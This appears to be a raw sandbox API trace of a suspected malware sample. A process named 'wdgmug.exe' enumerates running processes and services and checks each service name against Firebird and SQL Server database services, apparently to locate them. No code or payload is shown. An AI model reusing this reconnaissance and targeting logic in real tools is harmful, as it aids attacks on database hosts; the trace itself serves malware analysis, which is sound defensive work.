[0283.480] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.481] lstrlenW (lpString="svchost.exe") returned 11 [0283.481] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.481] lstrlenW (lpString="svchost.exe") returned 11 [0283.481] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.481] lstrlenW (lpString="svchost.exe") returned 11 [0283.481] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.482] lstrlenW (lpString="svchost.exe") returned 11 [0283.482] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.519] lstrlenW (lpString="svchost.exe") returned 11 [0283.519] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0283.519] lstrlenW (lpString="spoolsv.exe") returned 11 [0283.520] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.520] lstrlenW (lpString="svchost.exe") returned 11 [0283.520] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0283.520] lstrlenW (lpString="audiodg.exe") returned 11 [0283.520] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0283.521] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0283.521] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0283.521] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0283.521] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0283.522] lstrlenW (lpString="Memory Compression") returned 18 [0283.522] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0283.522] lstrlenW (lpString="taskhostw.exe") returned 13 [0283.522] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0283.523] lstrlenW (lpString="sihost.exe") returned 10 [0283.523] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.524] lstrlenW (lpString="svchost.exe") returned 11 [0283.524] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="MDMAgent.exe")) returned 1 [0283.524] lstrlenW (lpString="MDMAgent.exe") returned 12 [0283.524] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0283.525] lstrlenW (lpString="taskhostw.exe") returned 13 [0283.525] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0283.525] lstrlenW (lpString="explorer.exe") returned 12 [0283.525] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0283.526] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0283.526] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0283.526] lstrlenW (lpString="SearchUI.exe") returned 12 [0283.526] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0283.527] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0283.527] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.527] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0283.527] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0283.528] lstrlenW (lpString="mobsync.exe") returned 11 [0283.528] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0283.529] lstrlenW (lpString="wdgmug.exe") returned 10 [0283.530] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0283.530] lstrlenW (lpString="cmd.exe") returned 7 [0283.530] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0283.530] lstrlenW (lpString="conhost.exe") returned 11 [0283.531] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0283.531] CloseHandle (hObject=0x348) returned 1 [0283.531] Sleep (dwMilliseconds=0x1f4) [0284.198] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4adf98 [0284.198] EnumServicesStatusExW (in: hSCManager=0x4adf98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0284.199] GetLastError () returned 0xea [0284.199] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4012740 [0284.199] EnumServicesStatusExW (in: hSCManager=0x4adf98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4012740, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4012740, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0284.203] CloseServiceHandle (hSCObject=0x4adf98) returned 1 [0284.203] lstrlenW (lpString="AppXSvc") returned 7 [0284.203] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0284.203] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0284.204] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0284.204] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0284.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0284.204] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0284.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0284.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0284.204] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0284.204] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0284.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0284.204] lstrlenW (lpString="Audiosrv") returned 8 [0284.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0284.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0284.204] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0284.204] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0284.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0284.204] lstrlenW (lpString="BFE") returned 3 [0284.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0284.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0284.204] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0284.204] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0284.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0284.204] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0284.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0284.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0284.204] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0284.204] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0284.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0284.204] lstrlenW (lpString="CDPSvc") returned 6 [0284.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0284.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0284.205] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0284.205] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0284.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0284.205] lstrlenW (lpString="ClickToRunSvc") returned 13 [0284.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0284.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0284.205] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0284.205] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0284.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0284.205] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0284.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0284.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0284.205] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0284.205] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0284.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0284.205] lstrlenW (lpString="CryptSvc") returned 8 [0284.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0284.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0284.205] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0284.205] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0284.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0284.205] lstrlenW (lpString="DcomLaunch") returned 10 [0284.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0284.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0284.206] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0284.206] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0284.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0284.206] lstrlenW (lpString="DeviceAssociationService") returned 24 [0284.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0284.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0284.206] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0284.206] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0284.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0284.206] lstrlenW (lpString="Dhcp") returned 4 [0284.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0284.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0284.206] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0284.206] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0284.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0284.206] lstrlenW (lpString="Dnscache") returned 8 [0284.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0284.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0284.206] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0284.206] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0284.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0284.206] lstrlenW (lpString="DPS") returned 3 [0284.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0284.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0284.206] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0284.207] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0284.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0284.207] lstrlenW (lpString="DusmSvc") returned 7 [0284.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0284.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0284.207] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0284.207] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0284.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0284.207] lstrlenW (lpString="EventLog") returned 8 [0284.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0284.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0284.207] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0284.207] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0284.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0284.207] lstrlenW (lpString="EventSystem") returned 11 [0284.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0284.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0284.207] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0284.207] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0284.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0284.207] lstrlenW (lpString="FontCache") returned 9 [0284.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0284.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0284.207] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0284.207] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0284.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0284.208] lstrlenW (lpString="gpsvc") returned 5 [0284.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0284.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0284.208] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0284.208] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0284.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0284.208] lstrlenW (lpString="iphlpsvc") returned 8 [0284.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0284.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0284.208] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0284.208] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0284.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0284.208] lstrlenW (lpString="KeyIso") returned 6 [0284.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0284.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0284.208] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0284.208] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0284.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0284.208] lstrlenW (lpString="LanmanServer") returned 12 [0284.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0284.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0284.208] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0284.208] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0284.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0284.208] lstrlenW (lpString="LanmanWorkstation") returned 17 [0284.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0284.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0284.209] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0284.209] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0284.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0284.209] lstrlenW (lpString="lfsvc") returned 5 [0284.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0284.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0284.209] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0284.209] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0284.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0284.209] lstrlenW (lpString="lmhosts") returned 7 [0284.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0284.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0284.209] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0284.209] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0284.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0284.209] lstrlenW (lpString="LSM") returned 3 [0284.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0284.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0284.387] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0284.387] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0284.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0284.387] lstrlenW (lpString="MpsSvc") returned 6 [0284.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0284.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0284.388] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0284.388] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0284.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0284.388] lstrlenW (lpString="NcbService") returned 10 [0284.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0284.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0284.388] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0284.388] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0284.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0284.388] lstrlenW (lpString="netprofm") returned 8 [0284.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0284.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0284.388] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0284.388] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0284.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0284.388] lstrlenW (lpString="NgcSvc") returned 6 [0284.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0284.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0284.388] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0284.388] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0284.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0284.388] lstrlenW (lpString="NlaSvc") returned 6 [0284.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0284.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0284.388] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0284.389] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0284.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0284.389] lstrlenW (lpString="nsi") returned 3 [0284.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0284.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0284.389] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0284.389] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0284.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0284.389] lstrlenW (lpString="PcaSvc") returned 6 [0284.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0284.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0284.389] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0284.389] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0284.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 